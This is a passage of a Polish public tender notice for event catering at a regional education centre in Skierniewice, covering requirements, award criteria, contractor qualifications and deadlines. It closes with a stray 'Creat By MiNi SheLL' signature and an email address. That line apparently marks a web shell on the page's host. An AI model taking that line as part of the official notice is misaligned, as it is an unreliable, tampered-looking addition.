obrusów<br/>●	Zapewnienie stolików koktajlowych w ilości umożliwiającej sprawną obsługę gości<br/>●	Zapewnienie stołów cateringowych do wystawienia przekąsek, napojów, podgrzewaczy i zastawy<br/>●	Zapewnienie czarnych pokrowców na stoły cateringowe, stoliki koktajlowe<br/>●	Zamawiający wyklucza stosowanie naczyń, kubków oraz sztućców jednorazowych.<br/>●	Zamawiający wymaga zorganizowania pojemników na odpady i zabrania odpadów po zakończeniu spotkania.<br/>●	Wykonawca zobowiązuje się, że realizując zamówienie będzie przestrzegał przepisów ustawy z dnia 19 lipca 2019 r. – o zapewnieniu dostępności osobom ze szczególnymi potrzebami (t.j. Dz.U. 2024, poz. 14 11 z późn. zm.), w szczególności spełni wymagania w zakresie dostępności dla osób z niepełnosprawnościami, m.in. zapewni stoły tradycyjne/stoliki koktajlowe w ilości odpowiedniej dla liczby osób zgłoszonych przez Zamawiającego, w tym również miejsc dla osób poruszających się na wózkach inwalidzkich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-03-26 do 2025-03-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Zamawiający będzie oceniał oferty według następującego kryterium:<br/>1. Cena: 60%<br/>2. Termin płatności faktury: 40%<br/><br/>16.2. Punkty przyznawane za podane w pkt. 16.1. kryteria będą liczone według następujących wzorów:<br/>1. Cena:<br/>(Cmin/Cof) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert niepodlegających odrzuceniu<br/>- Cof - cena podana w ofercie badanej<br/><br/>2. Podstawowa termin płatności faktury to 7 dni od dnia dostarczenia Zamawiającemu prawidłowo wystawionej faktury.<br/>Wykonawca otrzyma 20 pkt, jeżeli zaoferuje 14 dniowy termin płatności faktury.<br/>Wykonawca otrzyma 40 pkt, jeżeli zaoferuje 21 dniowy termin płatności faktury.<br/>Niezaznaczenie żadnego pola albo zaznaczenie kilku pól oznacza przyjęcie podstawowego terminu płatności.<br/><br/>16.3. Oferta złożona przez wykonawcę może otrzymać 100 pkt.<br/><br/>16.4. W toku dokonywania badania i oceny ofert zamawiający może żądać udzielenia przez wykonawcę wyjaśnień treści złożonych<br/>przez niego ofert.<br/><br/>16.5. Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.2 Wykonawca posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/><br/>Wykonawca posiada niezbędne uprawnienia wymagane przepisami prawa do prowadzenia usług objętych przedmiotem zamówienia (na potwierdzenie Wykonawca składa do oferty oświadczenie o którym mowa w art. 125 ust. 1 Ustawy tj. oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu – według wzoru stanowiącego załącznik nr 3 do SWZ).<br/><br/>6.1.3. Wykonawca posiada doświadczenie.<br/><br/>Wykonawca posiada doświadczenie w realizacji umów dotyczących świadczenia usług cateringowych. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, należycie zrealizował co najmniej 3 usługi cateringowe przy wydarzeniach z udziałem minimum 35 uczestników. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie o którym mowa w art. 125 ust. 1 Ustawy tj. oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego – według wzoru stanowiącego załącznik nr 3 do SWZ (składane do oferty),<br/><br/>b)	oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507) - według wzoru stanowiącego załącznik nr 3 do SWZ (składane do oferty).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	oświadczenie o którym mowa w art. 125 ust. 1 Ustawy tj. oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego – według wzoru stanowiącego załącznik nr 3 do SWZ (składane do oferty),<br/><br/>b)	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; (na wezwanie Zamawiającego),<br/><br/>c)	zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (składane do oferty o ile dotyczy),<br/><br/>d)	oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie (składane do oferty o ile dotyczy).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/><br/>1. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy załączyć pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia dokonuje mocodawca lub notariusz.<br/><br/>2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>W przypadku, o którym mowa powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Oświadczenie przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje odpowiednio wykonawca lub<br/>wykonawca wspólnie ubiegający się o udzielenie zamówienia lub notariusz.<br/><br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmianę Umowy w przypadku ziszczenia się co najmniej jednej z poniższych okoliczności, na warunkach i w zakresie wskazanym poniżej:<br/>1)	w przedmiocie sposobu wykonania Przedmiotu Umowy: <br/>a)	jeżeli zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia lub decyzji organów administracji publicznej w tym poprzez zwiększenie, zmniejszenie zakresu świadczenia, lub zmiany metody, technologii realizacji Przedmiotu Umowy, w zakresie koniecznym do dostosowania do nowych przepisów prawa, wytycznych lub decyzji;<br/>2)	w przedmiocie zmiany terminów wykonania Umowy:<br/>a)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne, pożar na terenie objętym Przedmiotem Umowy, protesty społeczne, epidemia itp.) mającej bezpośredni wpływ na terminowość wykonywania usługi, <br/>2.	Pismo (wniosek) dotyczące zmian, o których mowa w ust. 1, wraz z uzasadnieniem, strona występująca z wnioskiem zobowiązana jest złożyć drugiej stronie. Wszelkie zmiany wymagają uprzedniej oceny i zgody Zamawiającego. Pomimo wystąpienia powyższych przesłanek, Zamawiający może odmówić dokonania zmiany umowy, jeżeli zmiana ta będzie stwarzała ryzyko utraty dofinansowania na przedmiot umowy.<br/>3.	Zmianę postanowień zawartych w Umowie uznaje się za istotną zgodnie z art. 454 ust. 2 PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia, Miejsce otwarcia: Centrum Rozwoju Edukacji Województwa Łódzkiego w Skierniewicach, ul. Stefana Batorego 64D, 96–100 Skierniewice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8.1.1. Z postępowania wyklucza się Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz. U. z 2023 r. poz. 1497 z późn. zm).<br/>W celu poświadczenia, iż brak jest podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia,<br/>Wykonawca zobowiązany jest złożyć oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 z późn. zm.) - według wzoru stanowiącego załącznik nr 3<br/>do SWZ (składane do oferty).

Creat By MiNi SheLL
Email: jattceo@gmail.com